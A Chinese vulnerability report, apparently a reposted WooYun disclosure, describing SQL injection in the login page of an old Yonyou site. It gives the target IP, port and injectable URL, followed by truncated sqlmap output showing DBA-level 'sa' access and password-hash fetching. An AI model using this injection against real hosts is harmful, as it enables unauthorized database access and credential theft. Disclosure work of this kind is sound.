用友某废弃站点存在SQL注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 晚上无聊,看看公司的网站有什么漏洞,哈哈,果然无意间又发现了一枚. 上一次提交公司的漏洞:http://www.wooyun.org/bugs/wooyun-2014-084920 为什么RANK一直没补啊,漏洞也不再我的列表下? @疯狗 @xsser ### 详细说明: 存在地址:http://125.35.5.234:81/ ping dbmservice.yonyou.com 感觉是很老的站点,于是乎,在登录账号的时候输入了',果不其然,发现有注入 构造下URL:http://125.35.5.234:81/checkuser.asp?loginname=admin&pwd=1 ``` [23:17:38] [INFO] fetching current user current user: 'sa' [23:17:38] [INFO] fetching current database current database: 'testdb' [23:17:38] [INFO] fetching server hostname hostname: 'XXTEST' [23:17:38] [INFO] testing if current user is DBA current user is DBA: True [23:17:39] [INFO] fetching database users [23:17:39] [INFO] the SQL query used returns 2 entries [23:17:39] [INFO] resumed: "BUILTIN\\\\Administrators" [23:17:39] [INFO] resumed: "sa" database management system users [2]: [*] BUILTIN\\Administrators [*] sa [23:17:39] [INFO] fetching database users password hashes [23:17:39] [INFO] the SQL query used returns 3 entries [23:17:39] [INFO] resumed: " "," " [23:17:39]...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息